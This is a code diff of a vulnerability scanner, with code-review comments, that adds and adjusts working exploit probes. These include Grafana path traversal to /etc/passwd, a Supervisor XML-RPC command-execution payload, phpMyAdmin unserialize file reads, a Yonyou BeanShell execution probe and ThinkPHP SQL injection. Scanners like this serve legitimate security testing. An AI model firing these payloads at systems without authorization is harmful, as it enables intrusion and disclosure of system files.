@@ -210,7 +211,7 @@ def cve_2015_1427_scan(self, url): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Payload': res + 'Request': res } return results @@ -256,8 +257,10 @@ def cve_2015_3337_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('/sbin/nologin' in res.text) - or ('root:x:0:0:root' in res.text)): + if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S) + # or (('Microsoft Corp' in res.text) + # and ('Microsoft TCP/IP for Windows' in res.text)) + ): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], @@ -345,7 +348,8 @@ def cve_2015_5531_scan(self, url): 'Path': path, 'Decode': 'ASCII decimal encode', 'Decode-Url': 'https://www.qqxiuzi.cn/bianma/ascii.htm' - } + }, + 'Request': res } return results diff --git a/payloads/F5BIGIP.py b/payloads/F5BIGIP.py index a720d90..6659ce2 100644 --- a/payloads/F5BIGIP.py +++ b/payloads/F5BIGIP.py @@ -20,6 +20,7 @@ from lib.tool.thread import thread from lib.tool import check from thirdparty import requests +import re class F5_BIG_IP(): def __init__(self): @@ -128,10 +129,9 @@ def cve_2020_5902_scan(self, url): if (('encrypted-password' in res.text) or ('partition-access' in res.text) or (('"output": "' in res.text) and ('"error": "",' in res.text)) - or ('/sbin/nologin' in res.text) - or ('root:x:0:0:root' in res.text) - or ('Microsoft Corp' in res.text) - or ('Microsoft TCP/IP for Windows' in res.text) + or re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S) + or (('Microsoft Corp' in res.text) + and ('Microsoft TCP/IP for Windows' in res.text)) ): results = { 'Target': target, 
@@ -150,7 +150,8 @@ def cve_2022_1388_scan(self, url): ''' vul_info = {} vul_info['app_name'] = self.app_name - vul_info['vul_type'] = 'unAuthorized' + # vul_info['vul_type'] = 'unAuthorized' + vul_info['vul_type'] = 'unAuth/RCE' vul_info['vul_id'] = 'CVE-2022-1388' vul_info['vul_method'] = 'POST' vul_info['headers'] = { @@ -193,12 +194,12 @@ def cve_2022_1388_scan(self, url): return None if (('commandResult' in res.text) - and (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text)) + and re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S) ): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Payload': res + 'Request': res } return results diff --git a/payloads/Gitea.py b/payloads/Gitea.py index 486b99a..24a1450 100644 --- a/payloads/Gitea.py +++ b/payloads/Gitea.py @@ -22,6 +22,7 @@ from lib.tool import head from thirdparty import requests from time import sleep +import re class Gitea(): def __init__(self): @@ -123,10 +124,9 @@ def gitea_unauthorized_scan(self, url): ) logger.logging(vul_info, res2.status_code, res2) # * LOG - if (('/sbin/nologin' in res2.text) - or ('root:x:0:0:root' in res2.text) - or ('Microsoft Corp' in res2.text) - or ('Microsoft TCP/IP for Windows' in res2.text) + if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res2.text, re.I|re.M|re.S) + or (('Microsoft Corp' in res2.text) + and ('Microsoft TCP/IP for Windows' in res2.text)) ): results = { 'Target': target, diff --git a/payloads/Grafana.py b/payloads/Grafana.py index face33b..0fe5cb1 100644 --- a/payloads/Grafana.py +++ b/payloads/Grafana.py @@ -20,6 +20,7 @@ from lib.tool import check from thirdparty import requests from time import sleep +import re class Grafana(): def __init__(self): 
@@ -44,10 +45,10 @@ def __init__(self): 'path': 'public/plugins/{}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:\Windows\System32\drivers\etc\hosts', 'data': '' }, - # { - # 'path': 'plugins/{}/../../../../../../../../../../../../../etc/passwd', - # 'data': '' - # }, + { + 'path': 'plugins/{}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd', + 'data': '' + }, # { # 'path': '{}/../../../../../../../../../../../../../etc/passwd', # 'data': '' @@ -110,10 +111,9 @@ def cve_2021_43798_scan(self, url): ) logger.logging(vul_info, res.status_code, res) # * LOG - if (('/sbin/nologin' in res.text) - or ('root:x:0:0:root' in res.text) - or ('Microsoft Corp' in res.text) - or ('Microsoft TCP/IP for Windows' in res.text) + if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S) + or (('Microsoft Corp' in res.text) + and ('Microsoft TCP/IP for Windows' in res.text)) ): results = { 'Target': res.request.url, diff --git a/payloads/Landray.py b/payloads/Landray.py index 71395d1..d98e3c6 100644 --- a/payloads/Landray.py +++ b/payloads/Landray.py @@ -21,6 +21,7 @@ from lib.tool import check from thirdparty import requests from time import sleep +import re class Landray(): def __init__(self): @@ -109,10 +110,9 @@ def cnvd_2021_28277_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('/sbin/nologin' in res.text) - or ('root:x:0:0:root' in res.text) - or ('Microsoft Corp' in res.text) - or ('Microsoft TCP/IP for Windows' in res.text) + if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S) + or (('Microsoft Corp' in res.text) + and ('Microsoft TCP/IP for Windows' in res.text)) or (('password' in res.text) and ('kmss.properties.encrypt.enabled = true' in res.text)) ): results = { diff --git a/payloads/MiniHttpd.py b/payloads/MiniHttpd.py index 4fb794c..ee4717e 100644 --- a/payloads/MiniHttpd.py 
+++ b/payloads/MiniHttpd.py @@ -21,6 +21,7 @@ from lib.tool import check from thirdparty import requests from time import sleep +import re class MiniHttpd(): def __init__(self): @@ -28,7 +29,7 @@ def __init__(self): self.headers = config.get('headers') self.proxies = config.get('proxies') - self.app_name = 'mini_httpd' + self.app_name = 'MiniHttpd' self.md = md5(self.app_name) self.cmd = 'echo ' + self.md @@ -80,9 +81,7 @@ def cve_2018_18778_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('/sbin/nologin' in res.text) - or ('root:x:0:0:root' in res.text) - ): + if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S)): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], diff --git a/payloads/NodeRED.py b/payloads/NodeRED.py index 9623a50..13fe77a 100644 --- a/payloads/NodeRED.py +++ b/payloads/NodeRED.py @@ -20,6 +20,7 @@ from lib.tool import check from thirdparty import requests from time import sleep +import re class NodeRED(): def __init__(self): @@ -94,10 +95,9 @@ def cve_2021_3223_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('/sbin/nologin' in res.text) - or ('root:x:0:0:root' in res.text) - or ('Microsoft Corp' in res.text) - or ('Microsoft TCP/IP for Windows' in res.text) + if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S) + or (('Microsoft Corp' in res.text) + and ('Microsoft TCP/IP for Windows' in res.text)) or ('To password protect the Node-RED editor and admin API' in res.text) ): results = { @@ -107,7 +107,8 @@ def cve_2021_3223_scan(self, url): 'Payload': { 'Url': url, 'Path': path - } + }, + 'Request': res } return results diff --git a/payloads/Nodejs.py b/payloads/Nodejs.py index bd301bb..92550bd 100644 --- a/payloads/Nodejs.py +++ b/payloads/Nodejs.py @@ -24,6 +24,7 @@ from lib.tool import check from thirdparty import requests from time import sleep +import re class Nodejs(): def __init__(self): 
@@ -125,15 +126,14 @@ def cve_2017_14849_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('/sbin/nologin' in res.text) - or ('root:x:0:0:root' in res.text) - or ('Microsoft Corp' in res.text) - or ('Microsoft TCP/IP for Windows' in res.text) + if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S) + or (('Microsoft Corp' in res.text) + and ('Microsoft TCP/IP for Windows' in res.text)) ): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Payload': res + 'Request': res } return results diff --git a/payloads/RubyOnRails.py b/payloads/RubyOnRails.py index d85a93c..47ea74a 100644 --- a/payloads/RubyOnRails.py +++ b/payloads/RubyOnRails.py @@ -175,10 +175,9 @@ def cve_2018_3760_scan(self, url): ) logger.logging(vul_info, res2.status_code, res2) # * LOG - if (('/sbin/nologin' in res2.text) - or ('root:x:0:0:root' in res2.text) - or ('Microsoft Corp' in res2.text) - or ('Microsoft TCP/IP for Windows' in res2.text) + if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res2.text, re.I|re.M|re.S) + or (('Microsoft Corp' in res2.text) + and ('Microsoft TCP/IP for Windows' in res2.text)) ): results = { 'Target': target, @@ -241,10 +240,9 @@ def cve_2019_5418_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('/sbin/nologin' in res.text) - or ('root:x:0:0:root' in res.text) - or ('Microsoft Corp' in res.text) - or ('Microsoft TCP/IP for Windows' in res.text) + if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S) + or (('Microsoft Corp' in res.text) + and ('Microsoft TCP/IP for Windows' in res.text)) ): results = { 'Target': target, diff --git a/payloads/Spring.py b/payloads/Spring.py index 4ad33f3..f28a9e5 100644 --- a/payloads/Spring.py +++ b/payloads/Spring.py @@ -49,6 +49,7 @@ from thirdparty import requests # from thirdparty import HackRequests from time import sleep +import re class Spring(): def __init__(self): 
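Review bot: Both RubyOnRails.py hunks replace the substring checks with `re.search(...)`, but unlike the other payload modules touched in this commit (ElasticSearch, F5BIGIP, Gitea, Grafana, Landray, MiniHttpd, NodeRED, Nodejs, Spring, ThinkPHP, phpMyadmin) this file gets no `+import re` hunk, and the diffstat's 14 changed lines are fully accounted for by the two hunks shown. Unless RubyOnRails.py already imports re above these lines, cve_2018_3760_scan and cve_2019_5418_scan raise NameError at `if (re.search(`, which sits after the try/except and so escapes it. Add `import re` beside the existing imports at the top of the file. Both enclosing functions start outside the hunks.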
@@ -342,10 +343,9 @@ def cve_2021_21234_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('/sbin/nologin' in res.text) - or ('root:x:0:0:root' in res.text) - or ('Microsoft Corp' in res.text) - or ('Microsoft TCP/IP for Windows' in res.text) + if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S) + or (('Microsoft Corp' in res.text) + and ('Microsoft TCP/IP for Windows' in res.text)) ): results = { 'Target': target, @@ -354,7 +354,8 @@ def cve_2021_21234_scan(self, url): 'Payload': { 'Url': url, 'Path': path - } + }, + 'Request': res } return results @@ -401,10 +402,9 @@ def cve_2020_5410_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('/sbin/nologin' in res.text) - or ('root:x:0:0:root' in res.text) - or ('Microsoft Corp' in res.text) - or ('Microsoft TCP/IP for Windows' in res.text) + if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S) + or (('Microsoft Corp' in res.text) + and ('Microsoft TCP/IP for Windows' in res.text)) ): results = { 'Target': target, @@ -413,7 +413,8 @@ def cve_2020_5410_scan(self, url): 'Payload': { 'Url': url, 'Path': path - } + }, + 'Request': res } return results diff --git a/payloads/Supervisor.py b/payloads/Supervisor.py new file mode 100644 index 0000000..2a08283 --- /dev/null +++ b/payloads/Supervisor.py 
@@ -0,0 +1,134 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Supervisor是用Python开发的一套通用的进程管理程序, 能将一个普通的命令行进程变为后台daemon, 并监控进程状态, 异常退出时能自动重启; +是Linux/Unix系统下的一个进程管理工具, 不支持Windows系统; + Supervisor扫描类: + 1. Supervisord 远程命令执行 + CVE-2017-11610 + Payload: https://vulhub.org/#/environments/supervisor/CVE-2017-11610/ + +file:///etc/passwd +file:///C:/Windows/System32/drivers/etc/hosts +file:///C:\Windows\System32\drivers\etc\hosts +''' + +from lib.api.dns import dns +from lib.initial.config import config +from lib.tool.md5 import md5, random_md5, random_int_1, random_int_2 +from lib.tool.logger import logger +from lib.tool.thread import thread +from lib.tool import check +from thirdparty import requests +from time import sleep + +class Supervisor(): + def __init__(self): + self.timeout = config.get('timeout') + self.headers = config.get('headers') + self.proxies = config.get('proxies') + + self.app_name = 'Supervisor' + self.md = md5(self.app_name) + self.cmd = 'echo ' + self.md + + self.random_num_1, self.random_num_2 = random_int_2(5) + + self.cve_2017_11610_payloads = [ + { + 'path': 'RPC2', + 'data': ''' + +supervisor.supervisord.options.warnings.linecache.os.system + + +expr {} + {} | tee -a /tmp/supervisord.log + + +'''.format(self.random_num_1, self.random_num_2) + }, + { + 'path': 'RPC2', + 'data': ''' + +supervisor.readLog + + +0 + + +0 + + +''' + }, + ] + + def cve_2017_11610_scan(self, url): + ''' Supervisord曝出了一个需认证的远程命令执行漏洞(CVE-2017-11610) + 通过POST请求向Supervisord管理界面提交恶意数据, 可以获取服务器操作权限, 带来严重的安全风险 + ''' + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'RCE' + vul_info['vul_id'] = 'CVE-2017-11610' + # vul_info['vul_method'] = 'POST' + vul_info['headers'] = { + 'Content-Type': 'text/xml' + } + + headers = self.headers.copy() + headers.update(vul_info['headers']) + + res_list = [] + + for payload in self.cve_2017_11610_payloads: + path = payload['path'] + data = payload['data'] + target = url + path + + vul_info['path'] = 
path + vul_info['data'] = data + vul_info['target'] = target + + try: + res = requests.post( + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + res_list.append(res) + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + if (str(self.random_num_1 + self.random_num_2) in res.text): + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request-1': res_list[0], + 'Request-2': res_list[1] + } + return results + + def addscan(self, url, vuln=None): + if vuln: + return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url)) + + return [ + thread(target=self.cve_2017_11610_scan, url=url) + ] + +supervisor = Supervisor() diff --git a/payloads/ThinkPHP.py b/payloads/ThinkPHP.py index 1f70455..8dd4b13 100644 --- a/payloads/ThinkPHP.py +++ b/payloads/ThinkPHP.py @@ -35,6 +35,7 @@ from lib.tool import head from thirdparty import requests from time import sleep +import re class ThinkPHP(): def __init__(self): @@ -104,7 +105,7 @@ def __init__(self): } ] - # * 以下payload没有找到测试环境, 所以没写poc, 哪个好心人提供一下环境QAQ + # * 以下payload没有找到测试环境, 暂时没写poc self.thinkphp_5_options_sqlinject_payloads = [ { 'path': 'index?options=id)%2bupdatexml(1,concat(0x7,user(),0x7e),1) from users%23 **', @@ -194,7 +195,8 @@ def cnvd_2018_24942_scan(self, url): 'Payload': { 'Url': url, 'Path': path - } + }, + 'Request': res } return results @@ -244,7 +246,7 @@ def cnnvd_201901_445_scan(self, url): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Payload': res + 'Request': res } return results 
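Review bot: addscan builds source text from caller-supplied strings and runs it through `eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))`, so a target URL (or vuln name) containing `"` or `)` becomes Python executed inside the scanner; `return thread(target=getattr(self, '{}_scan'.format(vuln)), url=url)` does the same dispatch without eval and fails cleanly on an unknown name. The check also writes to the target host (`tee -a /tmp/supervisord.log`) and then reads it back via supervisor.readLog, which only works when supervisord's logfile really is /tmp/supervisord.log — that appears to be how the linked vulhub environment is configured, but not a default install — so a miss here is not evidence the host is patched; a comment saying so, or a logfile-independent confirmation, would help. The bare `except:` after the request swallows KeyboardInterrupt and SystemExit as well; `except Exception:` keeps the existing fallback without that. The three `file:///...` lines at the end of the module docstring look like a paste leftover and should be removed.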
@@ -300,7 +302,8 @@ def thinkphp_2_x_rce_scan(self, url): 'Payload': { 'Url': url, 'Path': path - } + }, + 'Request': res } return results @@ -400,7 +403,7 @@ def cve_2018_1002015_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('root:x:0:0:root' in res.text) + if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S) or (self.md in check.check_res(res.text, self.md)) or (('PHP Version' in res.text) and ('PHP License' in res.text)) @@ -408,7 +411,7 @@ def cve_2018_1002015_scan(self, url): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Payload': res + 'Request': res } return results diff --git a/payloads/Weblogic.py b/payloads/Weblogic.py index 34d0eee..e8dde12 100644 --- a/payloads/Weblogic.py +++ b/payloads/Weblogic.py @@ -209,7 +209,8 @@ def cve_2020_14882_scan(self, url): 'Url': url, 'Path': path, 'Headers': vul_info['headers'] - } + }, + 'Request': res } return results diff --git a/payloads/Webmin.py b/payloads/Webmin.py index ad1966f..b46ebc9 100644 --- a/payloads/Webmin.py +++ b/payloads/Webmin.py @@ -111,7 +111,7 @@ def cve_2019_15107_scan(self, url): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Payload': res + 'Request': res } return results @@ -163,7 +163,7 @@ def cve_2019_15642_scan(self, url): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Payload': res + 'Request': res } return results diff --git a/payloads/Yonyou.py b/payloads/Yonyou.py index e016143..dc75c89 100644 --- a/payloads/Yonyou.py +++ b/payloads/Yonyou.py @@ -26,7 +26,7 @@ from lib.api.dns import dns from lib.initial.config import config -from lib.tool.md5 import md5, random_md5 +from lib.tool.md5 import md5, random_md5, random_int_1, random_int_2 from lib.tool.logger import logger from lib.tool.thread import thread from lib.tool import check 
@@ -42,10 +42,12 @@ def __init__(self): self.app_name = 'Yonyou' + self.random_num_1, self.random_num_2 = random_int_2() + self.cnvd_2021_30167_payloads = [ { 'path': 'servlet/~ic/bsh.servlet.BshServlet', - 'data': '' + 'data': 'bsh.script=print%28{}*{}%29%3B'.format(self.random_num_1, self.random_num_2) } ] @@ -113,7 +115,7 @@ def cnvd_2021_30167_scan(self, url): vul_info['target'] = target try: - res = requests.get( + res = requests.post( target, timeout=self.timeout, headers=headers, @@ -132,7 +134,7 @@ def cnvd_2021_30167_scan(self, url): logger.logging(vul_info, 'Error') return None - if ('BeanShell' in res.text): + if (str(self.random_num_1 * self.random_num_2) in res.text): results = { 'Target': target, 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], @@ -140,7 +142,8 @@ def cnvd_2021_30167_scan(self, url): 'Payload': { 'Url': url, 'Path': path - } + }, + 'Request': res } return results diff --git a/payloads/demo.py b/payloads/demo/demo.py similarity index 100% rename from payloads/demo.py rename to payloads/demo/demo.py diff --git a/payloads/demo2.py b/payloads/demo/demo2.py similarity index 100% rename from payloads/demo2.py rename to payloads/demo/demo2.py diff --git a/payloads/demo3.py b/payloads/demo/demo3.py similarity index 100% rename from payloads/demo3.py rename to payloads/demo/demo3.py diff --git a/payloads/phpMyadmin.py b/payloads/phpMyadmin.py index aa52e69..ffcbc3d 100644 --- a/payloads/phpMyadmin.py +++ b/payloads/phpMyadmin.py @@ -25,6 +25,7 @@ from lib.tool import check from thirdparty import requests from time import sleep +import re class phpMyadmin(): def __init__(self): 
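Review bot: cnvd_2021_30167_scan now POSTs `bsh.script=print%28{}*{}%29%3B` as a plain string body, and the vendored requests, like upstream, sets no Content-Type for a str body, so unless `headers` already carries `application/x-www-form-urlencoded` the servlet container will generally not parse the form field and the script is never evaluated, making the new product check miss a vulnerable host. Passing `data={'bsh.script': 'print({}*{});'.format(self.random_num_1, self.random_num_2)}` lets requests encode and label the body, or add `'Content-Type': 'application/x-www-form-urlencoded'` to vul_info['headers']. `str(self.random_num_1 * self.random_num_2) in res.text` is only as strong as the factors are large, and `random_int_2()` is called here without the `5` that Supervisor.py passes, so confirm it still yields numbers whose product cannot appear by chance in an ordinary page. The enclosing function starts outside the hunk.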
@@ -52,6 +53,18 @@ def __init__(self): ] self.wooyun_2016_199433_payloads = [ + { + 'path': 'scripts/setup.php', + 'data': 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}' + }, + { + 'path': 'scripts/setup.php', + 'data': 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"C:/Windows/System32/drivers/etc/hosts";}' + }, + { + 'path': 'scripts/setup.php', + 'data': 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"C:\Windows\System32\drivers\etc\hosts";}' + }, { 'path': 'setup.php', 'data': 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}' @@ -107,10 +120,9 @@ def cve_2018_12613_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('/sbin/nologin' in res.text) - or ('root:x:0:0:root' in res.text) - or ('Microsoft Corp' in res.text) - or ('Microsoft TCP/IP for Windows' in res.text) + if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S) + or (('Microsoft Corp' in res.text) + and ('Microsoft TCP/IP for Windows' in res.text)) ): results = { 'Target': target, @@ -161,10 +173,9 @@ def wooyun_2016_199433_scan(self, url): logger.logging(vul_info, 'Error') return None - if (('/sbin/nologin' in res.text) - or ('root:x:0:0:root' in res.text) - or ('Microsoft Corp' in res.text) - or ('Microsoft TCP/IP for Windows' in res.text) + if (re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', res.text, re.I|re.M|re.S) + or (('Microsoft Corp' in res.text) + and ('Microsoft TCP/IP for Windows' in res.text)) ): results = { 'Target': target, diff --git a/thirdparty/HackRequests/HackRequests.py b/thirdparty/HackRequests/HackRequests.py index 2191a66..8661c97 100644 --- a/thirdparty/HackRequests/HackRequests.py +++ b/thirdparty/HackRequests/HackRequests.py 
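Review bot: The two new Windows entries in `self.wooyun_2016_199433_payloads` declare `s:11:` for a 37-byte string (`C:/Windows/System32/drivers/etc/hosts`), and PHP's unserialize() rejects a string whose declared length does not match its body, so these payloads can never trigger and only cost a request each; `s:11` is correct only for `/etc/passwd`. Change both to `s:37:"C:/Windows/System32/drivers/etc/hosts"` and `s:37:"C:\\Windows\\System32\\drivers\\etc\\hosts"`. The backslash variant is also a non-raw Python literal, so `\W`, `\S`, `\d`, `\e` and `\h` are invalid escape sequences — kept literally today with a DeprecationWarning, a SyntaxWarning on 3.12 — hence the doubled backslashes. The enclosing __init__ continues outside the hunk.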
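Review bot: In the `@@ -107,10 +120,9 @@` hunk of cve_2018_12613_scan, `root:(x{1}|.*):\d{1,7}:\d{1,7}:root` under `re.S` lets `.*` span newlines, so any response containing `root:` followed somewhere later by `:NN:NN:root` is reported as a file read; the tightened Windows check (`Microsoft Corp` and `Microsoft TCP/IP for Windows`) is an improvement, but the Unix side got looser. Confine the wildcard to the password field and drop DOTALL: `if (re.search(r'root:[^:\n]*:\d{1,7}:\d{1,7}:root', res.text, re.I|re.M)`. The same pattern is repeated in wooyun_2016_199433_scan below and should be changed together. Both functions start before their hunks.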
@@ -201,7 +201,9 @@ def httpraw(self, raw: str, **kwargs): v = "" headers[k] = v index += 1 - headers["Connection"] = "close" + if not headers["Connection"]: + headers["Connection"] = "close" + if len(raws) < index + 1: body = '' else: @@ -237,7 +239,11 @@ def httpraw(self, raw: str, **kwargs): except KeyboardInterrupt: raise HackError("user exit") finally: - conn.close() + try: + rep.read_copy = rep.read() # * 2022-11-06 Clincat, copy rep.read() + conn.close() + except: + pass log["response"] = "HTTP/%.1f %d %s" % ( rep.version * 0.1, rep.status, rep.reason) + '\r\n' + str(rep.msg) @@ -316,7 +322,11 @@ def http(self, url, **kwargs): except KeyboardInterrupt: raise HackError("user exit") finally: - conn.close() + try: + rep.read_copy = rep.read() # * 2022-11-06 Clincat, copy rep.read() + conn.close() + except: + pass if post: log["request"] += "\r\n\r\n" + post @@ -381,7 +391,8 @@ def content(self): return self._content encode = self.rep.msg.get('content-encoding', None) try: - body = self.rep.read() + # body = self.rep.read() + body = self.rep.read_copy # * 2022-11-06 Clincat, use read_copy except socket.timeout: body = b'' if encode == 'gzip': diff --git a/vulcat.py b/vulcat.py index c72fc54..09b4d13 100644 --- a/vulcat.py +++ b/vulcat.py @@ -28,5 +28,5 @@ except KeyboardInterrupt: print(color.reset('CTRL + C exit the scan')) os._exit(0) -except Exception as e: - print(e) \ No newline at end of file +# except Exception as e: +# print(e) \ No newline at end of file
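Review bot: `if not headers["Connection"]:` raises KeyError whenever the raw request carries no Connection header, since `headers` holds only the names parsed from the request text just above; the old code set the header unconditionally and never hit this. Use `if not headers.get("Connection"):`. The lookup is also case-sensitive, so a request written with `connection:` would presumably get a second header appended — if httpraw is meant to be tolerant here, compare on a normalised key. httpraw's body continues outside the hunk on both sides.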
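Review bot: In the `@@ -237,7 +239,11 @@` hunk, `conn.close()` is skipped whenever `rep.read()` raises — socket.timeout on a slow body, or `rep` being unbound because the request itself failed — and the bare `except: pass` then hides that the connection was never closed, whereas the old `finally` always closed it. Move `conn.close()` out of the inner try so it runs unconditionally, and narrow the handler to `except Exception: pass` with a comment that a failed read is tolerated because content() has to cope with a missing `read_copy`. Note also that the body is now read eagerly and in full on every request with no size cap, so a hostile target can push an arbitrarily large response into memory where previously content() read on demand; consider `rep.read(limit)` if the callers can live with truncation. The same pattern is repeated in the `http()` hunk below. Both methods start before their hunks.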
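Review bot: In the `@@ -381,7 +391,8 @@` hunk, `body = self.rep.read_copy` raises AttributeError when the eager read in httpraw/http failed, because that failure was swallowed there and `read_copy` was never assigned; the surrounding `except socket.timeout` no longer catches anything since no socket read happens in content() any more. Use `body = getattr(self.rep, 'read_copy', b'')` so a failed read degrades to an empty body exactly as the old timeout path did. Delete the commented-out `# body = self.rep.read()` line rather than leaving it in. content() starts before the hunk and its gzip handling continues after it.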
